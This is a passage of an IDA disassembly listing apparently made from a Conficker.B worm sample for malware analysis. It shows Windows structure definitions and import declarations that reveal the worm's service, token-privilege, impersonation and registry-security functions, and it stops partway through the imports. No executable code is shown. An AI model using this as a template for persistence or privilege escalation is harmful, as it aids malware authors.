; ---------------------------------------------------------------------------
_WIN32_FIND_DATAA struc ; (sizeof=0x140, standard type)
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName db 260 dup(?)
cAlternateFileName db 14 dup(?)
_padding db 2 dup(?)
_WIN32_FIND_DATAA ends
; ---------------------------------------------------------------------------
in_addr::$C88FC62040169D5EE3E5BDA2C03A058C::$B9D7529FFD1842B2B059BD2E926FB2C5 struc ; (sizeof=0x4, standard type)
s_w1 dw ?
s_w2 dw ?
in_addr::$C88FC62040169D5EE3E5BDA2C03A058C::$B9D7529FFD1842B2B059BD2E926FB2C5 ends
; ---------------------------------------------------------------------------
in_addr::$C88FC62040169D5EE3E5BDA2C03A058C::$F085A1F6735C7CEA9C650424FAF692B1 struc ; (sizeof=0x4, standard type)
s_b1 db ?
s_b2 db ?
s_b3 db ?
s_b4 db ?
in_addr::$C88FC62040169D5EE3E5BDA2C03A058C::$F085A1F6735C7CEA9C650424FAF692B1 ends
; ---------------------------------------------------------------------------
in_addr::$C88FC62040169D5EE3E5BDA2C03A058C union ; (sizeof=0x4, standard type)
S_un_b in_addr::$C88FC62040169D5EE3E5BDA2C03A058C::$F085A1F6735C7CEA9C650424FAF692B1 ?
S_un_w in_addr::$C88FC62040169D5EE3E5BDA2C03A058C::$B9D7529FFD1842B2B059BD2E926FB2C5 ?
S_addr dd ?
in_addr::$C88FC62040169D5EE3E5BDA2C03A058C ends
; ---------------------------------------------------------------------------
in_addr struc ; (sizeof=0x4, standard type)
S_un in_addr::$C88FC62040169D5EE3E5BDA2C03A058C ?
in_addr ends
; ---------------------------------------------------------------------------
_MIDL_STUB_DESC::$5BCB627D3738D8B5DEACC268C24AE672 union ; (sizeof=0x4, standard type)
pAutoHandle dd ? ; offset
pPrimitiveHandle dd ? ; offset
pGenericBindingInfo dd ? ; offset
_MIDL_STUB_DESC::$5BCB627D3738D8B5DEACC268C24AE672 ends
; ---------------------------------------------------------------------------
MIDL_STUB_DESC struc ; (sizeof=0x50, standard type)
RpcInterfaceInformation dd ? ; offset
pfnAllocate dd ? ; offset
pfnFree dd ? ; offset
IMPLICIT_HANDLE_INFO _MIDL_STUB_DESC::$5BCB627D3738D8B5DEACC268C24AE672 ?
apfnNdrRundownRoutines dd ? ; offset
aGenericBindingRoutinePairs dd ? ; offset
apfnExprEval dd ? ; offset
aXmitQuintuple dd ? ; offset
pFormatTypes dd ? ; offset
fCheckBounds dd ?
Version dd ?
pMallocFreeStruct dd ? ; offset
MIDLVersion dd ?
CommFaultOffsets dd ? ; offset
aUserMarshalQuadruple dd ? ; offset
NotifyRoutineTable dd ? ; offset
mFlags dd ?
CsRoutineTables dd ? ; offset
ProxyServerInfo dd ? ; offset
pExprInfo dd ? ; offset
MIDL_STUB_DESC ends
; ---------------------------------------------------------------------------
sockaddr struc ; (sizeof=0x10, standard type)
sa_family dw ?
sa_data db 14 dup(?)
sockaddr ends
; ---------------------------------------------------------------------------
_QUERY_SERVICE_CONFIGW struc ; (sizeof=0x24, standard type)
dwServiceType dd ?
dwStartType dd ?
dwErrorControl dd ?
lpBinaryPathName dd ? ; offset
lpLoadOrderGroup dd ? ; offset
dwTagId dd ?
lpDependencies dd ? ; offset
lpServiceStartName dd ? ; offset
lpDisplayName dd ? ; offset
_QUERY_SERVICE_CONFIGW ends
; ---------------------------------------------------------------------------
tagLASTINPUTINFO struc ; (sizeof=0x8, standard type)
cbSize dd ?
dwTime dd ?
tagLASTINPUTINFO ends
; ---------------------------------------------------------------------------
_PROCESS_INFORMATION struc ; (sizeof=0x10, standard type)
hProcess dd ? ; offset
hThread dd ? ; offset
dwProcessId dd ?
dwThreadId dd ?
_PROCESS_INFORMATION ends
; ---------------------------------------------------------------------------
_STARTUPINFOA struc ; (sizeof=0x44, standard type)
cb dd ?
lpReserved dd ? ; offset
lpDesktop dd ? ; offset
lpTitle dd ? ; offset
dwX dd ?
dwY dd ?
dwXSize dd ?
dwYSize dd ?
dwXCountChars dd ?
dwYCountChars dd ?
dwFillAttribute dd ?
dwFlags dd ?
wShowWindow dw ?
cbReserved2 dw ?
lpReserved2 dd ? ; offset
hStdInput dd ? ; offset
hStdOutput dd ? ; offset
hStdError dd ? ; offset
_STARTUPINFOA ends
; ---------------------------------------------------------------------------
THREADENTRY32 struc ; (sizeof=0x1C, standard type)
dwSize dd ?
cntUsage dd ?
th32ThreadID dd ?
th32OwnerProcessID dd ?
tpBasePri dd ?
tpDeltaPri dd ?
dwFlags dd ?
THREADENTRY32 ends
; ---------------------------------------------------------------------------
PROCESSENTRY32 struc ; (sizeof=0x128, standard type)
dwSize dd ?
cntUsage dd ?
th32ProcessID dd ?
th32DefaultHeapID dd ?
th32ModuleID dd ?
cntThreads dd ?
th32ParentProcessID dd ?
pcPriClassBase dd ?
dwFlags dd ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ends
; ---------------------------------------------------------------------------
timeval struc ; (sizeof=0x8, standard type)
tv_sec dd ?
tv_usec dd ?
timeval ends
; ---------------------------------------------------------------------------
fd_set struc ; (sizeof=0x104, standard type)
fd_count dd ?
fd_array dd 64 dup(?)
fd_set ends
; ---------------------------------------------------------------------------
_FILETIME struc ; (sizeof=0x8, standard type)
dwLowDateTime dd ?
dwHighDateTime dd ?
_FILETIME ends
; ---------------------------------------------------------------------------
LUID struc ; (sizeof=0x8, standard type)
LowPart dd ?
HighPart dd ?
LUID ends
; ---------------------------------------------------------------------------
LUID_AND_ATTRIBUTES struc ; (sizeof=0xC, standard type)
Luid LUID ?
Attributes dd ?
LUID_AND_ATTRIBUTES ends
; ---------------------------------------------------------------------------
_TOKEN_PRIVILEGES struc ; (sizeof=0x10, standard type)
PrivilegeCount dd ?
Privileges LUID_AND_ATTRIBUTES ?
_TOKEN_PRIVILEGES ends
; ---------------------------------------------------------------------------
_LUID struc ; (sizeof=0x8, standard type)
LowPart dd ?
HighPart dd ?
_LUID ends
; ---------------------------------------------------------------------------
_LARGE_INTEGER::$837407842DC9087486FDFA5FEB63B74E struc ; (sizeof=0x8, standard type)
LowPart dd ?
HighPart dd ?
_LARGE_INTEGER::$837407842DC9087486FDFA5FEB63B74E ends
; ---------------------------------------------------------------------------
LARGE_INTEGER union ; (sizeof=0x8, standard type)
anonymous_0 _LARGE_INTEGER::$837407842DC9087486FDFA5FEB63B74E ?
u _LARGE_INTEGER::$837407842DC9087486FDFA5FEB63B74E ?
QuadPart dq ?
LARGE_INTEGER ends
; ---------------------------------------------------------------------------
POINT struc ; (sizeof=0x8, standard type)
x dd ?
y dd ?
POINT ends
; ---------------------------------------------------------------------------
MSG struc ; (sizeof=0x1C, standard type)
hwnd dd ? ; offset
message dd ?
wParam dd ?
lParam dd ?
time dd ?
pt POINT ?
MSG ends
; ---------------------------------------------------------------------------
IID struc ; (sizeof=0x10, standard type)
Data1 dd ?
Data2 dw ?
Data3 dw ?
Data4 db 8 dup(?)
IID ends
; ---------------------------------------------------------------------------
tagDEC::$4F4A858EF92DB102A98F119D95FB1FDC::$674876891A86A76F12C10005982BCA56 struc ; (sizeof=0x8, standard type)
Lo32 dd ?
Mid32 dd ?
tagDEC::$4F4A858EF92DB102A98F119D95FB1FDC::$674876891A86A76F12C10005982BCA56 ends
; ---------------------------------------------------------------------------
tagDEC::$4F4A858EF92DB102A98F119D95FB1FDC union ; (sizeof=0x8, standard type)
anonymous_0 tagDEC::$4F4A858EF92DB102A98F119D95FB1FDC::$674876891A86A76F12C10005982BCA56 ?
Lo64 dq ?
tagDEC::$4F4A858EF92DB102A98F119D95FB1FDC ends
; ---------------------------------------------------------------------------
tagDEC::$B7BB294B9CFFB3110AEF9F2255F0D37C::$7F8459940C2B08BD5D82B0F27239141B struc ; (sizeof=0x2, standard type)
scale db ?
sign db ?
tagDEC::$B7BB294B9CFFB3110AEF9F2255F0D37C::$7F8459940C2B08BD5D82B0F27239141B ends
; ---------------------------------------------------------------------------
tagDEC::$B7BB294B9CFFB3110AEF9F2255F0D37C union ; (sizeof=0x2, standard type)
anonymous_0 tagDEC::$B7BB294B9CFFB3110AEF9F2255F0D37C::$7F8459940C2B08BD5D82B0F27239141B ?
signscale dw ?
tagDEC::$B7BB294B9CFFB3110AEF9F2255F0D37C ends
; ---------------------------------------------------------------------------
DECIMAL struc ; (sizeof=0x10, standard type)
wReserved dw ?
anonymous_0 tagDEC::$B7BB294B9CFFB3110AEF9F2255F0D37C ?
Hi32 dd ?
anonymous_1 tagDEC::$4F4A858EF92DB102A98F119D95FB1FDC ?
DECIMAL ends
; ---------------------------------------------------------------------------
tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62::$B0D3970BD9C14DE56D9FF8B0685C9EC0::$0FDBD249F1AECD6A49409B6B82281578 struc ; (sizeof=0x8, standard type)
pvRecord dd ? ; offset
pRecInfo dd ? ; offset
tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62::$B0D3970BD9C14DE56D9FF8B0685C9EC0::$0FDBD249F1AECD6A49409B6B82281578 ends
; ---------------------------------------------------------------------------
tagCY::$4ADA6AE34E722E24764E0C4FBCDA3E73 struc ; (sizeof=0x8, standard type)
Lo dd ?
Hi dd ?
tagCY::$4ADA6AE34E722E24764E0C4FBCDA3E73 ends
; ---------------------------------------------------------------------------
CY union ; (sizeof=0x8, standard type)
anonymous_0 tagCY::$4ADA6AE34E722E24764E0C4FBCDA3E73 ?
int64 dq ?
CY ends
; ---------------------------------------------------------------------------
tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62::$B0D3970BD9C14DE56D9FF8B0685C9EC0 union ; (sizeof=0x8, standard type)
llVal dq ?
lVal dd ?
bVal db ?
iVal dw ?
fltVal dd ?
dblVal dq ?
boolVal dw ?
scode dd ?
cyVal CY ?
date dq ?
bstrVal dd ? ; offset
punkVal dd ? ; offset
pdispVal dd ? ; offset
parray dd ? ; offset
pbVal dd ? ; offset
piVal dd ? ; offset
plVal dd ? ; offset
pllVal dd ? ; offset
pfltVal dd ? ; offset
pdblVal dd ? ; offset
pboolVal dd ? ; offset
pscode dd ? ; offset
pcyVal dd ? ; offset
pdate dd ? ; offset
pbstrVal dd ? ; offset
ppunkVal dd ? ; offset
ppdispVal dd ? ; offset
pparray dd ? ; offset
pvarVal dd ? ; offset
byref dd ? ; offset
cVal db ?
uiVal dw ?
ulVal dd ?
ullVal dq ?
intVal dd ?
uintVal dd ?
pdecVal dd ? ; offset
pcVal dd ? ; offset
puiVal dd ? ; offset
pulVal dd ? ; offset
pullVal dd ? ; offset
pintVal dd ? ; offset
puintVal dd ? ; offset
anonymous_0 tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62::$B0D3970BD9C14DE56D9FF8B0685C9EC0::$0FDBD249F1AECD6A49409B6B82281578 ?
tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62::$B0D3970BD9C14DE56D9FF8B0685C9EC0 ends
; ---------------------------------------------------------------------------
tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62 struc ; (sizeof=0x10, standard type)
vt dw ?
wReserved1 dw ?
wReserved2 dw ?
wReserved3 dw ?
anonymous_0 tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62::$B0D3970BD9C14DE56D9FF8B0685C9EC0 ?
tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62 ends
; ---------------------------------------------------------------------------
tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF union ; (sizeof=0x10, standard type)
anonymous_0 tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF::$1033A5F6F8F25C9C3389DB0C83C35F62 ?
decVal DECIMAL ?
tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF ends
; ---------------------------------------------------------------------------
VARIANTARG struc ; (sizeof=0x10, standard type)
anonymous_0 tagVARIANT::$6012875A659CB552968B6FC1CCACD1FF ?
VARIANTARG ends
; ---------------------------------------------------------------------------
_SYSTEMTIME struc ; (sizeof=0x10, standard type)
wYear dw ?
wMonth dw ?
wDayOfWeek dw ?
wDay dw ?
wHour dw ?
wMinute dw ?
wSecond dw ?
wMilliseconds dw ?
_SYSTEMTIME ends
; ---------------------------------------------------------------------------
FILETIME struc ; (sizeof=0x8, standard type)
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
; ---------------------------------------------------------------------------
_WIN32_FIND_DATAW struc ; (sizeof=0x250, standard type)
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dw 260 dup(?)
cAlternateFileName dw 14 dup(?)
_WIN32_FIND_DATAW ends
; ---------------------------------------------------------------------------
_SERVICE_STATUS struc ; (sizeof=0x1C, standard type)
dwServiceType dd ?
dwCurrentState dd ?
dwControlsAccepted dd ?
dwWin32ExitCode dd ?
dwServiceSpecificExitCode dd ?
dwCheckPoint dd ?
dwWaitHint dd ?
_SERVICE_STATUS ends
; ---------------------------------------------------------------------------
WSAData struc ; (sizeof=0x190, standard type)
wVersion dw ?
wHighVersion dw ?
szDescription db 257 dup(?)
szSystemStatus db 129 dup(?)
iMaxSockets dw ?
iMaxUdpDg dw ?
db ? ; undefined
db ? ; undefined
lpVendorInfo dd ? ; offset
WSAData ends
; ---------------------------------------------------------------------------
_OSVERSIONINFOA struc ; (sizeof=0x94, standard type)
dwOSVersionInfoSize dd ?
dwMajorVersion dd ?
dwMinorVersion dd ?
dwBuildNumber dd ?
dwPlatformId dd ?
szCSDVersion db 128 dup(?)
_OSVERSIONINFOA ends
; ---------------------------------------------------------------------------
_SID_IDENTIFIER_AUTHORITY struc ; (sizeof=0x6, standard type)
Value db 6 dup(?)
_SID_IDENTIFIER_AUTHORITY ends
; ---------------------------------------------------------------------------
CPPEH_RECORD struc ; (sizeof=0x18, standard type)
old_esp dd ?
exc_ptr dd ? ; offset
prev_er dd ? ; offset
handler dd ? ; offset
msEH_ptr dd ? ; offset
disabled dd ?
CPPEH_RECORD ends
; ---------------------------------------------------------------------------
_msEH struc ; (sizeof=0xC)
_unk dd ? ; base 16
FilterProc dd ? ; offset
ExitProc dd ? ; offset
_msEH ends
;
; +-------------------------------------------------------------------------+
; | This file has been generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2009 by Hex-Rays, <support@hex-rays.com> |
; | License info: 48-303F-7194-02 |
; | Hassen Saidi - SRI International |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6B80CEC090E436D336F7038C73BB4624
; File Name : C:\Documents and Settings\Michael Hogsett\Desktop\idata_conficker_B.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 9A0000
; Section 1. (virtual address 00001000)
; Virtual size : 00000428 ( 1064.)
; Section size in file : 00000424 ( 1060.)
; Offset to raw data for section: 00000200
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
;
; Imports from advapi32.dll
;
; OS type : MS Windows
; Application type: DLL 32bit
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; LSTATUS __stdcall RegOpenKeyExW(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult)
extrn RegOpenKeyExW:dword ; CODE XREF: sub_9AD363+3C�p
; sub_9AD3ED+36�p
; DATA XREF: ...
; LSTATUS __stdcall RegSetKeySecurity(HKEY hKey, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor)
extrn RegSetKeySecurity:dword ; CODE XREF: sub_9AD271+A7�p
; DATA XREF: sub_9AD271+A7�r
; SC_HANDLE __stdcall OpenSCManagerW(LPCWSTR lpMachineName, LPCWSTR lpDatabaseName, DWORD dwDesiredAccess)
extrn OpenSCManagerW:dword ; CODE XREF: sub_9AD062+3E�p
; DATA XREF: sub_9AD062+3E�r
; BOOL __stdcall EnumServicesStatusW(SC_HANDLE hSCManager, DWORD dwServiceType, DWORD dwServiceState, LPENUM_SERVICE_STATUSW lpServices, DWORD cbBufSize, LPDWORD pcbBytesNeeded, LPDWORD lpServicesReturned, LPDWORD lpResumeHandle)
extrn EnumServicesStatusW:dword ; CODE XREF: sub_9AD062+7A�p
; DATA XREF: sub_9AD062+7A�r
; SC_HANDLE __stdcall OpenServiceW(SC_HANDLE hSCManager, LPCWSTR lpServiceName, DWORD dwDesiredAccess)
extrn OpenServiceW:dword ; CODE XREF: sub_9AD062+FD�p
; DATA XREF: sub_9AD062+FD�r
; BOOL __stdcall QueryServiceConfigW(SC_HANDLE hService, LPQUERY_SERVICE_CONFIGW lpServiceConfig, DWORD cbBufSize, LPDWORD pcbBytesNeeded)
extrn QueryServiceConfigW:dword ; CODE XREF: sub_9AD062+11D�p
; DATA XREF: sub_9AD062+11D�r
; BOOL __stdcall QueryServiceConfig2W(SC_HANDLE hService, DWORD dwInfoLevel, LPBYTE lpBuffer, DWORD cbBufSize, LPDWORD pcbBytesNeeded)
extrn QueryServiceConfig2W:dword ; CODE XREF: sub_9AD062+143�p
; DATA XREF: sub_9AD062+143�r
; BOOL __stdcall ImpersonateLoggedOnUser(HANDLE hToken)
extrn ImpersonateLoggedOnUser:dword ; CODE XREF: sub_9AC33A+45�p
; DATA XREF: sub_9AC33A+45�r
; BOOL __stdcall InitializeSecurityDescriptor(PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision)
extrn InitializeSecurityDescriptor:dword ; CODE XREF: sub_9AC163+4E�p
; sub_9AD271+8A�p
; DATA XREF: ...
; DWORD __stdcall GetLengthSid(PSID pSid)
extrn GetLengthSid:dword ; CODE XREF: sub_9AC163+6F�p
; sub_9AD271+49�p
; DATA XREF: ...
; BOOL __stdcall InitializeAcl(PACL pAcl, DWORD nAclLength, DWORD dwAclRevision)
extrn InitializeAcl:dword ; CODE XREF: sub_9AC163+9A�p
; sub_9AD271+6D�p
; DATA XREF: ...
; BOOL __stdcall AddAccessAllowedAce(PACL pAcl, DWORD dwAceRevision, DWORD AccessMask, PSID pSid)
extrn AddAccessAllowedAce:dword ; CODE XREF: sub_9AC163+A9�p
; sub_9AD271+7E�p
; DATA XREF: ...
; BOOL __stdcall SetSecurityDescriptorDacl(PSECURITY_DESCRIPTOR pSecurityDescriptor, BOOL bDaclPresent, PACL pDacl, BOOL bDaclDefaulted)
extrn SetSecurityDescriptorDacl:dword ; CODE XREF: sub_9AC163+B9�p
; sub_9AD271+98�p
; DATA XREF: ...
; BOOL __stdcall SetFileSecurityA(LPCSTR lpFileName, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor)
extrn SetFileSecurityA:dword ; CODE XREF: sub_9AC163+C8�p
; DATA XREF: sub_9AC163+C8�r
; LSTATUS __stdcall RegQueryValueExA(HKEY hKey, LPCSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn RegQueryValueExA:dword ; CODE XREF: sub_9AC0AE+32�p
; DATA XREF: sub_9AC0AE+32�r
; LSTATUS __stdcall RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult)
extrn RegOpenKeyExA:dword ; CODE XREF: sub_9AC064+17�p
; sub_9AC0AE+19�p
; DATA XREF: ...
; LSTATUS __stdcall RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData)
extrn RegSetValueExA:dword ; CODE XREF: sub_9AC064+31�p
; sub_9AD71D+1CB�p
; DATA XREF: ...
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_9AC064+3F�p
; sub_9AC0AE+40�p ...
; BOOL __stdcall LookupPrivilegeValueA(LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid)
extrn LookupPrivilegeValueA:dword ; CODE XREF: sub_9AB5DC+3C�p
; DATA XREF: sub_9AB5DC+3C�r
; BOOL __stdcall AdjustTokenPrivileges(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength)
extrn AdjustTokenPrivileges:dword ; CODE XREF: sub_9AB5DC+52�p
; DATA XREF: sub_9AB5DC+52�r
; BOOL __stdcall ChangeServiceConfigA(SC_HANDLE hService, DWORD dwServiceType, DWORD dwStartType, DWORD dwErrorControl, LPCSTR lpBinaryPathName, LPCSTR lpLoadOrderGroup, LPDWORD lpdwTagId, LPCSTR lpDependencies, LPCSTR lpServiceStartName, LPCSTR lpPassword, LPCSTR lpDisplayName)
extrn ChangeServiceConfigA:dword ; CODE XREF: sub_9AB558+69�p
; DATA XREF: sub_9AB558+69�r
; BOOL __stdcall RevertToSelf()
extrn RevertToSelf:dword ; CODE XREF: sub_9A89BC+1F�p
; DATA XREF: sub_9A89BC+1F�r
; SC_HANDLE __stdcall CreateServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, LPCSTR lpDisplayName, DWORD dwDesiredAccess, DWORD dwServiceType, DWORD dwStartType, DWORD dwErrorControl, LPCSTR lpBinaryPathName, LPCSTR lpLoadOrderGroup, LPDWORD lpdwTagId, LPCSTR lpDependencies, LPCSTR lpServiceStartName, LPCSTR lpPassword)
extrn CreateServiceA:dword ; CODE XREF: sub_9A7F48+3A�p
; DATA XREF: sub_9A7F48+3A�r
; BOOL __stdcall StartServiceA(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCSTR *lpServiceArgVectors)
extrn StartServiceA:dword ; CODE XREF: sub_9A7F48+4F�p
; DATA XREF: sub_9A7F48+4F�r
; SC_HANDLE __stdcall OpenSCManagerA(LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess)
extrn OpenSCManagerA:dword ; CODE XREF: sub_9A7EE7+14�p
; sub_9A7F48+E�p ...
; SC_HANDLE __stdcall OpenServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, DWORD dwDesiredAccess)
extrn OpenServiceA:dword ; CODE XREF: sub_9A7EE7+2A�p
; sub_9AB558+2A�p
; DATA XREF: ...
; BOOL __stdcall CloseServiceHandle(SC_HANDLE hSCObject)
extrn CloseServiceHandle:dword ; CODE XREF: sub_9A7EE7+54�p
; sub_9A7EE7+57�p ...
; BOOL __stdcall ControlService(SC_HANDLE hService, DWORD dwControl, LPSERVICE_STATUS lpServiceStatus)
extrn ControlService:dword ; CODE XREF: sub_9A7EE7+43�p
; sub_9AB558+44�p
; DATA XREF: ...
; BOOL __stdcall DeleteService(SC_HANDLE hService)
extrn DeleteService:dword ; CODE XREF: sub_9A7EE7+4D�p
; DATA XREF: sub_9A7EE7+4D�r
; BOOL __stdcall OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle)
extrn OpenProcessToken:dword ; CODE XREF: sub_9A72CA+19�p
; sub_9AB5DC+16�p ...
; BOOL __stdcall GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength)
extrn GetTokenInformation:dword ; CODE XREF: sub_9A72CA+39�p
; sub_9A72CA+75�p
; DATA XREF: ...
; BOOL __stdcall AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID *pSid)
extrn AllocateAndInitializeSid:dword ; CODE XREF: sub_9A72CA+B1�p
; sub_9A72CA+C6�p ...
; BOOL __stdcall EqualSid(PSID pSid1, PSID pSid2)
extrn EqualSid:dword ; CODE XREF: sub_9A72CA+E8�p
; sub_9A72CA+F8�p
; DATA XREF: ...
; PVOID __stdcall FreeSid(PSID pSid)
extrn FreeSid:dword ; CODE XREF: sub_9A72CA+122�p
; sub_9A72CA+12C�p ...
; LSTATUS __stdcall RegEnumKeyExW(HKEY hKey, DWORD dwIndex, LPWSTR lpName, LPDWORD lpcchName, LPDWORD lpReserved, LPWSTR lpClass, LPDWORD lpcchClass, PFILETIME lpftLastWriteTime)
extrn RegEnumKeyExW:dword ; CODE XREF: sub_9AD363+77�p
; DATA XREF: sub_9AD363+B�r
; LSTATUS __stdcall RegSetValueExW(HKEY hKey, LPCWSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData)
extrn RegSetValueExW:dword ; CODE XREF: sub_9AD3ED+F8�p
; sub_9AD50E+F2�p ...
; LSTATUS __stdcall RegQueryValueExW(HKEY hKey, LPCWSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn RegQueryValueExW:dword ; CODE XREF: sub_9AD3ED+6B�p
; sub_9AD3ED+B5�p
; DATA XREF: ...
; LSTATUS __stdcall RegFlushKey(HKEY hKey)
extrn RegFlushKey:dword ; CODE XREF: sub_9AD50E+1DF�p
; DATA XREF: sub_9AD50E+1DF�r
; LSTATUS __stdcall RegCreateKeyExW(HKEY hKey, LPCWSTR lpSubKey, DWORD Reserved, LPWSTR lpClass, DWORD dwOptions, REGSAM samDesired, const LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition)
extrn RegCreateKeyExW:dword ; CODE XREF: sub_9AD50E+C5�p
; sub_9AD50E+19E�p
; DATA XREF: ...
; LSTATUS __stdcall RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, const LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition)
extrn RegCreateKeyExA:dword ; CODE XREF: sub_9AD71D+1A2�p
; DATA XREF: sub_9AD71D+1A2�r
;
; Imports from kernel32.dll
;
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; DWORD __stdcall WaitForMultipleObjects(DWORD nCount, const HANDLE *lpHandles, BOOL bWaitAll, DWORD dwMilliseconds)
extrn WaitForMultipleObjects:dword ; CODE XREF: sub_9ADD9B+190�p
; DATA XREF: sub_9ADD9B+190�r
; BOOL __stdcall SystemTimeToFileTime(const SYSTEMTIME *lpSystemTime, LPFILETIME lpFileTime)
extrn SystemTimeToFileTime:dword ; CODE XREF: sub_9ADB52+91�p
; DATA XREF: sub_9ADB52+91�r
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_9AD00D+49�p
; DATA XREF: sub_9AD00D+49�r
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_9A7170+2A�p
; sub_9A7CD0+49�p ...
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_9A722A+44�p
; sub_9A7670+5E�p ...
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_9A72CA+139�p
; sub_9A799E+135�p ...
; HGLOBAL __stdcall GlobalFree(HGLOBAL hMem)
extrn GlobalFree:dword ; CODE XREF: sub_9A72CA+12F�p
; sub_9A752A+EC�p ...
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_9A72CA+58�p
; sub_9A9654+56�p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_9A72CA+43�p
; sub_9A799E+F0�p ...
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_9A72CA+12�p
; sub_9AB5DC+F�p
; DATA XREF: ...
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_9A7410+50�p
; sub_9A8326+42�p ...
; DWORD __stdcall GetVersion()
extrn GetVersion:dword ; CODE XREF: sub_9A752A+127�p
; StartAddress+41�p ...
; BOOL __stdcall MoveFileExA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, DWORD dwFlags)
extrn MoveFileExA:dword ; CODE XREF: sub_9A752A+E3�p
; sub_9A7670+31�p ...
; BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName)
extrn MoveFileA:dword ; CODE XREF: sub_9A752A+89�p
; DATA XREF: sub_9A752A+89�r
; DWORD __stdcall GetTempPathA(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetTempPathA:dword ; CODE XREF: sub_9A7670+FD�p
; sub_9A7FAE+70�p ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_9A7670+49�p
; StartAddress+36�p ...
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
